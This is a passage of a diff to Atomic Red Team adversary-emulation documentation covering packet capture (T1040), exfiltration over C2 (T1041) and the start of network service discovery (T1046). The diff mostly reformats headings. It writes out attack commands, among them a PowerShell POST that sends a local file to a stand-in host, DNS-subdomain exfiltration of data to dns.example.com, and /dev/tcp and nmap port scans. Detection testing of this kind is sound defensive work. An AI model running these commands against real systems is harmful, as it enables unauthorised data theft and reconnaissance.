 if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi;
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```sh
 (which pkg && pkg install -y wireshark-nox11)
 ```

+### Atomic Test #3: Packet Capture macOS using tcpdump or tshark

-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Packet Capture macOS using tcpdump or tshark
 Perform a PCAP on macOS. This will require Wireshark/tshark to be installed. TCPdump may already be installed.

 Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface en0A.

 **Supported Platforms:** macOS

+**auto_generated_guid:** `9d04efee-eff5-4240-b8d2-07792b873608`

-**auto_generated_guid:** 9d04efee-eff5-4240-b8d2-07792b873608
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | interface | Specify interface to perform PCAP on. | string | en0A|

-
-#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)

 ```bash
 sudo tcpdump -c 5 -nnni #{interface}    
@@ -176,26 +137,24 @@ if [ -x "$(command -v tshark)" ]; then sudo tshark -c 5 -i #{interface}; fi;
 ```


+#### Dependencies: Run with `bash`!

-
-#### Dependencies:  Run with `bash`!
 ##### Description: Check if at least one of tcpdump or tshark is installed.
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```bash
 if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi;
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```bash
 (which yum && yum -y install epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)
 ```

+### Atomic Test #4: Packet Capture Windows Command Prompt

-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Packet Capture Windows Command Prompt
 Perform a packet capture using the windows command prompt. This will require a host that has Wireshark/Tshark
 installed.

@@ -203,14 +162,10 @@ Upon successful execution, tshark will execute and capture 5 packets on interfac

 **Supported Platforms:** Windows

+**auto_generated_guid:** `a5b2f6a0-24b4-493e-9590-c699f75723ca`

-**auto_generated_guid:** a5b2f6a0-24b4-493e-9590-c699f75723ca
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | interface | Specify interface to perform PCAP on. | string | Ethernet|
@@ -219,99 +174,80 @@ Upon successful execution, tshark will execute and capture 5 packets on interfac
 | npcap_url | npcap installed download URL | url | https://nmap.org/npcap/dist/npcap-1.31.exe|
 | npcap_path | path to npcap.sys | path | C:&#92;Program Files&#92;Npcap&#92;npcap.sys|

-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 "c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
 ```


+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe".
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (test-path "#{tshark_path}") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
 Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\wireshark_installer.exe" #{wireshark_url}
 Start-Process "PathToAtomicsFolder\..\ExternalPayloads\wireshark_installer.exe" /S
 ```
+
 ##### Description: npcap must be installed.
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (test-path "#{npcap_path}") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
 Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\npcap_installer.exe" #{npcap_url}
 Start-Process "PathToAtomicsFolder\..\ExternalPayloads\npcap_installer.exe"
 ```

+### Atomic Test #5: Windows Internal Packet Capture

-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Windows Internal Packet Capture
 Uses the built-in Windows packet capture
 After execution you should find a file named trace.etl and trace.cab in the temp directory

 **Supported Platforms:** Windows

+**auto_generated_guid:** `b5656f67-d67f-4de8-8e62-b5581630f528`

-**auto_generated_guid:** b5656f67-d67f-4de8-8e62-b5581630f528
-
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 netsh trace start capture=yes tracefile=%temp%\trace.etl maxsize=10
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 netsh trace stop >nul 2>&1
 TIMEOUT /T 5 >nul 2>&1
 del %temp%\trace.etl >nul 2>&1
 del %temp%\trace.cab >nul 2>&1
 ```
+### Atomic Test #6: Windows Internal pktmon capture

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - Windows Internal pktmon capture
 Will start a packet capture and store log file as t1040.etl.
 https://lolbas-project.github.io/lolbas/Binaries/Pktmon/

 **Supported Platforms:** Windows

+**auto_generated_guid:** `c67ba807-f48b-446e-b955-e4928cd1bf91`

-**auto_generated_guid:** c67ba807-f48b-446e-b955-e4928cd1bf91
-
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 pktmon.exe start --etw  -f %TEMP%\t1040.etl
@@ -319,473 +255,391 @@ TIMEOUT /T 5 >nul 2>&1
 pktmon.exe stop
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 del %TEMP%\t1040.etl
 ```
+### Atomic Test #7: Windows Internal pktmon set filter

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - Windows Internal pktmon set filter
 Select Desired ports for packet capture 
 https://lolbas-project.github.io/lolbas/Binaries/Pktmon/

 **Supported Platforms:** Windows

+**auto_generated_guid:** `855fb8b4-b8ab-4785-ae77-09f5df7bff55`

-**auto_generated_guid:** 855fb8b4-b8ab-4785-ae77-09f5df7bff55
-
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 pktmon.exe filter add -p 445
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 pktmon filter remove
 ```
+### Atomic Test #8: Packet Capture macOS using /dev/bpfN with sudo

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #8 - Packet Capture macOS using /dev/bpfN with sudo
 Opens a /dev/bpf file (O_RDONLY) and captures packets for a few seconds.

 **Supported Platforms:** macOS

+**auto_generated_guid:** `e6fe5095-545d-4c8b-a0ae-e863914be3aa`

-**auto_generated_guid:** e6fe5095-545d-4c8b-a0ae-e863914be3aa
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | ifname | Specify interface to perform PCAP on. | string | en0|
 | csource_path | Path to C program source | string | PathToAtomicsFolder/T1040/src/macos_pcapdemo.c|
 | program_path | Path to compiled C program | string | /tmp/t1040_macos_pcapdemo|

-
-#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)

 ```bash
 sudo #{program_path} -i #{ifname} -t 3
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```bash
 rm -f #{program_path}
 ```

+#### Dependencies: Run with `bash`!

-
-#### Dependencies:  Run with `bash`!
 ##### Description: compile C program
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```bash
 exit 1
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```bash
 cc #{csource_path} -o #{program_path}
 ```

+### Atomic Test #9: Filtered Packet Capture macOS using /dev/bpfN with sudo

-
-
-<br/>
-<br/>
-
-## Atomic Test #9 - Filtered Packet Capture macOS using /dev/bpfN with sudo
 Opens a /dev/bpf file (O_RDONLY), sets BPF filter for 'udp' and captures packets for a few seconds.

 **Supported Platforms:** macOS

+**auto_generated_guid:** `e2480aee-23f3-4f34-80ce-de221e27cd19`

-**auto_generated_guid:** e2480aee-23f3-4f34-80ce-de221e27cd19
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | ifname | Specify interface to perform PCAP on. | string | en0|
 | csource_path | Path to C program source | string | PathToAtomicsFolder/T1040/src/macos_pcapdemo.c|
 | program_path | Path to compiled C program | string | /tmp/t1040_macos_pcapdemo|

-
-#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)

 ```bash
 sudo #{program_path} -f -i #{ifname} -t 3
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```bash
 rm -f #{program_path}
 ```

+#### Dependencies: Run with `bash`!

-
-#### Dependencies:  Run with `bash`!
 ##### Description: compile C program
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```bash
 exit 1
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```bash
 cc #{csource_path} -o #{program_path}
 ```

+### Atomic Test #10: Packet Capture FreeBSD using /dev/bpfN with sudo

-
-
-<br/>
-<br/>
-
-## Atomic Test #10 - Packet Capture FreeBSD using /dev/bpfN with sudo
 Opens a /dev/bpf file (O_RDONLY) and captures packets for a few seconds.

 **Supported Platforms:** Linux

+**auto_generated_guid:** `e2028771-1bfb-48f5-b5e6-e50ee0942a14`

-**auto_generated_guid:** e2028771-1bfb-48f5-b5e6-e50ee0942a14
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | ifname | Specify interface to perform PCAP on. | string | em0|
 | csource_path | Path to C program source | string | PathToAtomicsFolder/T1040/src/freebsd_pcapdemo.c|
 | program_path | Path to compiled C program | string | /tmp/t1040_freebsd_pcapdemo|

-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)

 ```sh
 sudo #{program_path} -i #{ifname} -t 3
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```sh
 rm -f #{program_path}
 ```

+#### Dependencies: Run with `sh`!

-
-#### Dependencies:  Run with `sh`!
 ##### Description: compile C program
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```sh
 exit 1
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```sh
 cc #{csource_path} -o #{program_path}
 ```

+### Atomic Test #11: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo

-
-
-<br/>
-<br/>
-
-## Atomic Test #11 - Filtered Packet Capture FreeBSD using /dev/bpfN with sudo
 Opens a /dev/bpf file (O_RDONLY), sets BPF filter for 'udp' and captures packets for a few seconds.

 **Supported Platforms:** Linux

+**auto_generated_guid:** `a3a0d4c9-c068-4563-a08d-583bd05b884c`

-**auto_generated_guid:** a3a0d4c9-c068-4563-a08d-583bd05b884c
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | ifname | Specify interface to perform PCAP on. | string | em0|
 | csource_path | Path to C program source | string | PathToAtomicsFolder/T1040/src/freebsd_pcapdemo.c|
 | program_path | Path to compiled C program | string | /tmp/t1040_freebsd_pcapdemo|

-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)

 ```sh
 sudo #{program_path} -f -i #{ifname} -t 3
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```sh
 rm -f #{program_path}
 ```

+#### Dependencies: Run with `sh`!

-
-#### Dependencies:  Run with `sh`!
 ##### Description: compile C program
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```sh
 exit 1
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```sh
 cc #{csource_path} -o #{program_path}
 ```

+### Atomic Test #12: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo

-
-
-<br/>
-<br/>
-
-## Atomic Test #12 - Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo
 Captures packets with domain=AF_PACKET, type=SOCK_RAW for a few seconds.

 **Supported Platforms:** Linux

+**auto_generated_guid:** `10c710c9-9104-4d5f-8829-5b65391e2a29`

-**auto_generated_guid:** 10c710c9-9104-4d5f-8829-5b65391e2a29
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | csource_path | Path to C program source | string | PathToAtomicsFolder/T1040/src/linux_pcapdemo.c|
 | program_path | Path to compiled C program | string | /tmp/t1040_linux_pcapdemo|

-
-#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)

 ```bash
 sudo #{program_path} -a -t 3
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```bash
 rm -f #{program_path}
 ```

+#### Dependencies: Run with `bash`!

-
-#### Dependencies:  Run with `bash`!
 ##### Description: compile C program
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```bash
 if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```bash
 cc #{csource_path} -o #{program_path}
 ```

+### Atomic Test #13: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo

-
-
-<br/>
-<br/>
-
-## Atomic Test #13 - Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo
 Captures packets with domain=AF_INET,type=SOCK_RAW,protocol=TCP for a few seconds.

 **Supported Platforms:** Linux

+**auto_generated_guid:** `7a0895f0-84c1-4adf-8491-a21510b1d4c1`

-**auto_generated_guid:** 7a0895f0-84c1-4adf-8491-a21510b1d4c1
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | csource_path | Path to C program source | string | PathToAtomicsFolder/T1040/src/linux_pcapdemo.c|
 | program_path | Path to compiled C program | string | /tmp/t1040_linux_pcapdemo|

-
-#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)

 ```bash
 sudo #{program_path} -4 -p 6 -t 3
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```bash
 rm -f #{program_path}
 ```

+#### Dependencies: Run with `bash`!

-
-#### Dependencies:  Run with `bash`!
 ##### Description: compile C program
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```bash
 if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```bash
 cc #{csource_path} -o #{program_path}
 ```

+### Atomic Test #14: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo

-
-
-<br/>
-<br/>
-
-## Atomic Test #14 - Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo
 Captures packets with domain=AF_INET,type=SOCK_PACKET,protocol=UDP for a few seconds.
 SOCK_PACKET is "obsolete" according to the man page, but still works on Ubuntu 20.04

 **Supported Platforms:** Linux

+**auto_generated_guid:** `515575ab-d213-42b1-aa64-ef6a2dd4641b`

-**auto_generated_guid:** 515575ab-d213-42b1-aa64-ef6a2dd4641b
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | csource_path | Path to C program source | string | PathToAtomicsFolder/T1040/src/linux_pcapdemo.c|
 | program_path | Path to compiled C program | string | /tmp/t1040_linux_pcapdemo|

-
-#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)

 ```bash
 sudo #{program_path} -4 -P -p 17 -t 3
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```bash
 rm -f #{program_path}
 ```

+#### Dependencies: Run with `bash`!

-
-#### Dependencies:  Run with `bash`!
 ##### Description: compile C program
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```bash
 if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```bash
 cc #{csource_path} -o #{program_path}
 ```

+### Atomic Test #15: Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo

-
-
-<br/>
-<br/>
-
-## Atomic Test #15 - Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo
 Captures packets with domain=AF_PACKET,type=SOCK_RAW for a few seconds.
 Sets a BPF filter on the socket to filter for UDP traffic.

 **Supported Platforms:** Linux

+**auto_generated_guid:** `b1cbdf8b-6078-48f5-a890-11ea19d7f8e9`

-**auto_generated_guid:** b1cbdf8b-6078-48f5-a890-11ea19d7f8e9
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | csource_path | Path to C program source | string | PathToAtomicsFolder/T1040/src/linux_pcapdemo.c|
 | program_path | Path to compiled C program | string | /tmp/t1040_linux_pcapdemo|

-
-#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)

 ```bash
 sudo #{program_path} -a -f -t 3
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```bash
 rm -f #{program_path}
 ```

+#### Dependencies: Run with `bash`!

-
-#### Dependencies:  Run with `bash`!
 ##### Description: compile C program
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```bash
 if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```bash
 cc #{csource_path} -o #{program_path}
 ```

+### Atomic Test #16: PowerShell Network Sniffing

-
-
-<br/>
-<br/>
-
-## Atomic Test #16 - PowerShell Network Sniffing
 PowerShell Built-in Cmdlets to capture network traffic.
 https://learn.microsoft.com/en-us/powershell/module/neteventpacketcapture/new-neteventsession?view=windowsserver2022-ps

 **Supported Platforms:** Windows

+**auto_generated_guid:** `9c15a7de-de14-46c3-bc2a-6d94130986ae`

-**auto_generated_guid:** 9c15a7de-de14-46c3-bc2a-6d94130986ae
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

 ```powershell
 New-NetEventSession -Name Capture007 -LocalFilePath "$ENV:Temp\sniff.etl"
@@ -795,13 +649,8 @@ Stop-NetEventSession -Name Capture007
 Remove-NetEventSession -Name Capture007
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 del $ENV:Temp\sniff.etl
 ```
-
-
-
-
-
-<br/>
@@ -1,41 +1,32 @@
 # T1041 - Exfiltration Over C2 Channel
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1041)
-<blockquote>

-Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.
+## Description from ATT&CK

-</blockquote>
+> Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.
+
+[Source](https://attack.mitre.org/techniques/T1041)

 ## Atomic Tests

- [Atomic Test #1 - C2 Data Exfiltration](#atomic-test-1---c2-data-exfiltration)
+- [Atomic Test #1: C2 Data Exfiltration](#atomic-test-1-c2-data-exfiltration)
+- [Atomic Test #2: Text Based Data Exfiltration using DNS subdomains](#atomic-test-2-text-based-data-exfiltration-using-dns-subdomains)

- [Atomic Test #2 - Text Based Data Exfiltration using DNS subdomains](#atomic-test-2---text-based-data-exfiltration-using-dns-subdomains)
+### Atomic Test #1: C2 Data Exfiltration

-
-<br/>
-
-## Atomic Test #1 - C2 Data Exfiltration
 Exfiltrates a file present on the victim machine to the C2 server.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `d1253f6e-c29b-49dc-b466-2147a6191932`

-**auto_generated_guid:** d1253f6e-c29b-49dc-b466-2147a6191932
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | destination_url | Destination URL to post encoded data. | string | example.com|
 | filepath | The file which is being exfiltrated to the C2 Server. | path | $env:TEMP&#92;LineNumbers.txt|

-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 if(-not (Test-Path #{filepath})){ 
@@ -46,36 +37,23 @@ $filecontent = Get-Content -Path #{filepath}
 Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive
 ```

+### Atomic Test #2: Text Based Data Exfiltration using DNS subdomains

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Text Based Data Exfiltration using DNS subdomains
 Simulates an adversary using DNS tunneling to exfiltrate data over a Command and Control (C2) channel.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `c9207f3e-213d-4cc7-ad2a-7697a7237df9`

-**auto_generated_guid:** c9207f3e-213d-4cc7-ad2a-7697a7237df9
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | dns_server | DNS server IP address or domain name. | url | dns.example.com|
 | exfiltrated_data | Data to be exfiltrated. | string | SecretDataToExfiltrate|
 | chunk_size | Size of each DNS query chunk (in characters). | integer | 63|

-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 $dnsServer = "#{dns_server}"
@@ -93,9 +71,3 @@ foreach ($chunk in $chunks) {
 }
 ```

-
-
-
-
-
-<br/>
@@ -1,102 +1,70 @@
 # T1046 - Network Service Discovery
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1046)
-<blockquote>

-Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port, vulnerability, and/or wordlist scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021)   
+## Description from ATT&CK

-Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.
+> Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port, vulnerability, and/or wordlist scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021)
+> 
+> Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.
+> 
+> Within macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host’s registered services on the network. For example, adversaries can use a mDNS query (such as <code>dns-sd -B _ssh._tcp .</code>) to find other systems broadcasting the ssh service.(Citation: apple doco bonjour description)(Citation: macOS APT Activity Bradley)

-Within macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host’s registered services on the network. For example, adversaries can use a mDNS query (such as <code>dns-sd -B _ssh._tcp .</code>) to find other systems broadcasting the ssh service.(Citation: apple doco bonjour description)(Citation: macOS APT Activity Bradley)
-
-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1046)

 ## Atomic Tests

- [Atomic Test #1 - Port Scan](#atomic-test-1---port-scan)
+- [Atomic Test #1: Port Scan](#atomic-test-1-port-scan)
+- [Atomic Test #2: Port Scan Nmap](#atomic-test-2-port-scan-nmap)
+- [Atomic Test #3: Port Scan NMap for Windows](#atomic-test-3-port-scan-nmap-for-windows)
+- [Atomic Test #4: Port Scan using python](#atomic-test-4-port-scan-using-python)
+- [Atomic Test #5: WinPwn - spoolvulnscan](#atomic-test-5-winpwn---spoolvulnscan)
+- [Atomic Test #6: WinPwn - MS17-10](#atomic-test-6-winpwn---ms17-10)
+- [Atomic Test #7: WinPwn - bluekeep](#atomic-test-7-winpwn---bluekeep)
+- [Atomic Test #8: WinPwn - fruit](#atomic-test-8-winpwn---fruit)
+- [Atomic Test #9: Network Service Discovery for Containers](#atomic-test-9-network-service-discovery-for-containers)
+- [Atomic Test #10: Port-Scanning /24 Subnet with PowerShell](#atomic-test-10-port-scanning-24-subnet-with-powershell)
+- [Atomic Test #11: Remote Desktop Services Discovery via PowerShell](#atomic-test-11-remote-desktop-services-discovery-via-powershell)
+- [Atomic Test #12: Port Scan using nmap (Port range)](#atomic-test-12-port-scan-using-nmap-port-range)

- [Atomic Test #2 - Port Scan Nmap](#atomic-test-2---port-scan-nmap)
+### Atomic Test #1: Port Scan

- [Atomic Test #3 - Port Scan NMap for Windows](#atomic-test-3---port-scan-nmap-for-windows)
-
- [Atomic Test #4 - Port Scan using python](#atomic-test-4---port-scan-using-python)
-
- [Atomic Test #5 - WinPwn - spoolvulnscan](#atomic-test-5---winpwn---spoolvulnscan)
-
- [Atomic Test #6 - WinPwn - MS17-10](#atomic-test-6---winpwn---ms17-10)
-
- [Atomic Test #7 - WinPwn - bluekeep](#atomic-test-7---winpwn---bluekeep)
-
- [Atomic Test #8 - WinPwn - fruit](#atomic-test-8---winpwn---fruit)
-
- [Atomic Test #9 - Network Service Discovery for Containers](#atomic-test-9---network-service-discovery-for-containers)
-
- [Atomic Test #10 - Port-Scanning /24 Subnet with PowerShell](#atomic-test-10---port-scanning-24-subnet-with-powershell)
-
- [Atomic Test #11 - Remote Desktop Services Discovery via PowerShell](#atomic-test-11---remote-desktop-services-discovery-via-powershell)
-
- [Atomic Test #12 - Port Scan using nmap (Port range)](#atomic-test-12---port-scan-using-nmap-port-range)
-
-
-<br/>
-
-## Atomic Test #1 - Port Scan
 Scan ports to check for listening ports.

 Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout.

 **Supported Platforms:** Linux, macOS

+**auto_generated_guid:** `68e907da-2539-48f6-9fc9-257a78c05540`

-**auto_generated_guid:** 68e907da-2539-48f6-9fc9-257a78c05540
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | host | Host to scan. | string | 192.168.1.1|

-
-#### Attack Commands: Run with `bash`! 
-
+#### Attack Commands: Run with `bash`!

 ```bash
 for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
 ```

+### Atomic Test #2: Port Scan Nmap

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Port Scan Nmap
 Scan ports to check for listening ports with Nmap.
 Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.

 **Supported Platforms:** Linux, macOS

+**auto_generated_guid:** `515942b0-a09f-4163-a7bb-22fefb6f185f`

-**auto_generated_guid:** 515942b0-a09f-4163-a7bb-22fefb6f185f
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | host | Host to scan. | string | 192.168.1.1|
 | port | Ports to scan. | string | 80|
 | network_range | Network Range to Scan. | string | 192.168.1.0/24|

-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)

 ```sh
 sudo nmap -sS #{network_range} -p #{port}
@@ -105,270 +73,199 @@ nc -nv #{host} #{port}
 ```


+#### Dependencies: Run with `sh`!

-
-#### Dependencies:  Run with `sh`!
 ##### Description: Check if nmap command exists on the machine
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```sh
 if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```sh
 (which yum && yum -y install epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)||(which pkg && pkg install -y nmap)
 ```
+
 ##### Description: Check if nc command exists on the machine
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```sh
 if [ -x "$(command -v nc)" ]; then exit 0; else exit 1; fi;
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```sh
 (which yum && yum -y install epel-release nc)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y netcat)||(which pkg && pkg install -y netcat)
 ```
+
 ##### Description: Check if telnet command exists on the machine
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```sh
 if [ -x "$(command -v telnet)" ]; then exit 0; else exit 1; fi;
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```sh
 (which yum && yum -y install epel-release telnet)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y telnet)
 ```

+### Atomic Test #3: Port Scan NMap for Windows

-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Port Scan NMap for Windows
 Scan ports to check for listening ports for the local host 127.0.0.1

 **Supported Platforms:** Windows

